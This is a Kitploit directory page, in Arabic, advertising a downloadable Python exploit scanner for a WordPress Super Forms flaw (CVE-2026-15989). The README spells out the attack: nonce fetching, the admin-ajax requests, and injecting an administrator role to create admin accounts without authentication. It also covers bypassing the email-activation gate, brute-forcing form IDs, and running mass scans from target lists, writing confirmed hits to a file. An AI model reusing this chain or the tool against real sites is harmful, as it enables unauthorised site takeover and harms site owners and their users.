Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-15989 — ماسح PoC بلغة Python للثغرة CVE-2026-15989، يستغل حقن الأدوار غير المصادق عليه في WordPress Super Forms لإنشاء حسابات مسؤول والتحقق من الوصول. | Kitploit
أدوات/GitHubGitHub/antid00t/cve-2026-15989
تصعيد الامتيازاتماسحات الثغرات الأمنيةهجمات كلمات المرورالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHubantid00t/cve-2026-15989

CVE-2026-15989

ماسح PoC بلغة Python للثغرة CVE-2026-15989، يستغل حقن الأدوار غير المصادق عليه في WordPress Super Forms لإنشاء حسابات مسؤول والتحقق من الوصول.

1منذ 4س 19دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
                  █████╗  ███╗   ██╗ ████████╗ ██╗ ██████╗   ██████╗   ██████╗  ████████╗
                 ██╔══██╗ ████╗  ██║ ╚══██╔══╝ ██║ ██╔══██╗ ██╔═████╗ ██╔═████╗ ╚══██╔══╝
              ███████║ ██╔██╗ ██║    ██║    ██║ ██║  ██║ ██║██╔██║ ██║██╔██║    ██║
              ██╔══██║ ██║╚██╗██║    ██║    ██║ ██║  ██║ ████╔╝██║ ████╔╝██║    ██║
              ██║  ██║ ██║ ╚████║    ██║    ██║ ██████╔╝ ╚██████╔╝ ╚██████╔╝    ██║
              ╚═╝  ╚═╝ ╚═╝  ╚═══╝    ╚═╝    ╚═╝ ╚═════╝   ╚═════╝   ╚═════╝     ╚═╝

💉 Super Forms — ماسح رفع الصلاحيات متعدد المختبرات

CVE-2026-15989 · إنشاء حساب مسؤول دون مصادقة

                                       » E X P L O I T S «

Python 3.8+ CVSS 9.8 CRITICAL WordPress Engine Banner style Telegram

🔥 اكتشاف تلقائي بدون بصمة · حمولات تراعي التحقق · بدون أي مصادقة · تصنيف صادق

screen02


🎯 الهدف

إضافة WordPressSuper Forms – Drag & Drop Form Builder (إضافة Register & Login)
الإصدار المتأثر<= 6.3.316
الإصدار المُرقَّع6.3.317
المصادقة❌ غير مطلوبة — يكفي أي نموذج تسجيل منشور
CVSS9.8 CRITICAL

⚡ السلاسل

👑 CVE-2026-15989 — مفتاح role المُدرَج في القائمة البيضاء ← إنشاء مسؤول
GET admin-ajax.php?action=super_create_nonce ──► _sfs_id session + sf_nonce
        │
POST admin-ajax.php  action=super_submit_form  data=<JSON>
        │
      before_email_success_msg()  (Register & Login add-on)
        │
$other_userdata = array( ..., 'role', ... )   ◄── client key whitelisted
        │
$data['role']['value']  ──►  $userdata['role']   (register_user_role overwritten)
        │
wp_insert_user()  ──►  🔥 administrator account, zero authentication

تقوم الإضافة بنسخ $data['role']['value'] مباشرةً إلى مصفوفة بيانات المستخدم دون التحقق منها مقابل register_user_role المُهيَّأ من المسؤول، ودون قائمة سماح ودون أي فحص للصلاحيات — حقل واحد مُحقَن "role": {"value":"administrator"} يحسم الأمر.

🎟️ إثبات تسجيل الدخول — تجاوز بوابة التنشيط
POST wp-login.php   log / pwd / testcookie
        │                    + action=super_submit_form   ◄── the magic field
        │
check_user_login_status()  ──► pending/blocked gate SKIPPED
        │
GET /wp-admin/users.php
        │
200 = administrator proven  ·  403 = subscriber (patched build)

لا تفرض الإضافة بوابة تنشيط البريد الإلكتروني / الإشراف إلا عندما لا يكون إجراء POST هو super_submit_form — لذا فإن نفس إجراء النموذج الذي يسجّل المستخدم يفتح أيضًا تسجيل الدخول إليه، حتى قبل أي تحقق من البريد الإلكتروني.

🧨 وضع FULL — تخمين معرّف النموذج على مرحلتين (دون الحاجة إلى بصمة)
discovery empty (REST · sitemap · links · ?page_id probe)
        │
PHASE 1 — form-ID sweep 1..50, minimal payload, OWN SESSION PER ID
        │                       (shared sessions would invalidate each nonce)
        │
'required fields' reject ──► PHASE 2 — REST markup fetch ──► full payload retry
        │
every accepted candidate ──► login proof per id
        │
contact form? ──► UNVERIFIED (never a false positive)
registration? ──► 👑 verified administrator

النماذج غير الخاصة بالتسجيل تُجيب أيضًا بـ error:false، لذا فإن كل معرّف مقبول ليس سوى مرشّح حتى يتم إثبات بيانات الاعتماد عبر تسجيل دخول حقيقي.

🚀 البدء السريع

# zero dependencies — pure Python 3 stdlib (rich is optional, for the console)
python3 cve-2026-15989_poc.py --list labs.txt --output results.txt

# tuned concurrency / timeout
python3 cve-2026-15989_poc.py --list labs.txt --threads 20 --timeout 15 -o results.txt

# FULL MODE: discovery + role injection + login proof + form-ID brute (1..50)
python3 cve-2026-15989_poc.py --list labs.txt --full --output results.txt

labs.txt — عنوان URL أساسي واحد لكل سطر:

http://localhost
http://192.168.56.101/lab-wp
https://10.0.0.5:8443/lab        # self-signed TLS is handled automatically
# comments and blank lines are ignored

🛠️ الخيارات

الخيارالوصف
--list FILEملف الأهداف — عنوان URL واحد لكل سطر (مطلوب)
--output, -o FILEقائمة الإصابات — تُكتب مباشرةً الأهداف VULNERABLE فقط (بدون ANSI)
--threads Nعدد عمال الأهداف المتزامنين (الافتراضي 10)
--timeout Nمهلة المقبس لكل طلب بالثواني (الافتراضي 10)
--fullتشغيل السلسلة كاملةً — يضيف آلية تخمين معرّف النموذج الاحتياطية (سيتم إنشاء حسابات على الأهداف الثغرة)

🧾 حالات النتيجة

الحالةالمعنى
VULNERABLEتم إنشاء الحساب و إثبات وصول المسؤول إلى wp-admin (200)
NOT-VULNERABLEتسجيل الدخول ناجح لكن صفحات الإدارة 403 — تم تجاهل الدور ← إصدار مُرقَّع
UNVERIFIEDتم قبول الإرسال لكن رُفض تسجيل الدخول (حساب مقفل/معلّق أو نموذج غير تسجيل) — لا يُبلَّغ عنه أبدًا كإيجابية كاذبة صامتة
BLOCKEDتم رفض الإرسال (reCAPTCHA، CSRF، حقول مطلوبة، honeypot…)
ERRORهدف غير قابل للوصول / فشل DNS — يُبلَّغ عنه بالسبب الدقيق

✨ الميزات

  • 🔍 اكتشاف تلقائي بدون بصمة — محتوى REST المُصيَّر (wp-json + احتياطي ?rest_route=) ← فهرس sitemap ← أكثر من 40 مسار تسجيل متعدد اللغات (/register، /kayit-ol، /registrieren…) ← فحص ?page_id=N؛ يعمل مع أي قالب ومنشئ صفحات ونمط روابط دائمة
  • 🧬 توليف حمولات تراعي التحقق — يُملأ كل حقل مُصيَّر تلقائيًا كما يفعل المتصفح: القيم الافتراضية الخاصة به، محتوى textarea، خيارات القوائم المنسدلة/مربعات الاختيار/أزرار الراديو، أنواع data-validation (email، number، date، time، phone، IBAN، color، URL)
  • 🎟️ CSRF تلقائي — super_create_nonce من nopriv مرتبط بجلسة _sfs_id؛ تحصل محاولات التخمين على جلستها الخاصة حتى لا تُبطل الـ nonces بعضها البعض
  • 👑 تصنيف صادق — VULNERABLE فقط عند إثبات الوصول إلى wp-admin؛ تُفصل الإصدارات المُرقَّعة عبر فحص 403؛ تظهر الحسابات المقفلة كـ UNVERIFIED
  • 🥷 تجاوز بوابة التنشيط — إثبات تسجيل الدخول يحمل action=super_submit_form، متجاوزًا بوابة التحقق من البريد الإلكتروني / الإشراف الخاصة بالإضافة
  • 🧨 وضع FULL — تخمين معرّف النموذج على مرحلتين مع إثبات تسجيل دخول لكل معرّف (لا يمكن أن تُنتج نماذج الاتصال إيجابيات كاذبة أبدًا)
  • 🛡️ تقوية عناوين URL — روابط قوالب الثيم ({{ data.url }})، والأحرف التحكمية، والمضيفين بأسماء IDN/الشرطة التركية تُنقّى تلقائيًا
  • 📁 قائمة إصابات نظيفة — يسجّل --output الأهداف المؤكدة فقط، ويُضاف مباشرةً، دائمًا نص عادي (متوافق مع grep/parse)
  • 📊 وحدة تحكم Rich — لافتة ANSI Shadow بنمط antid00t، لوحة نتائج مباشرة، جدول ملخص؛ تراجع سلس إلى النص العادي بدون rich
  • 🐍 بدون تبعيات — مكتبة Python 3 القياسية فقط (rich اختياري للتحسين البصري)

📋 المتطلبات

  • الهدف: Super Forms <= 6.3.316 مع تفعيل إضافة Register & Login ووجود نموذج منشور واحد على الأقل (STANDARD) — لا يحتاج وضع FULL إلى أي نموذج قابل للاكتشاف على الإطلاق
  • المهاجم: Python 3.8+ — لا حاجة إلى pip install
تنزيل الأداة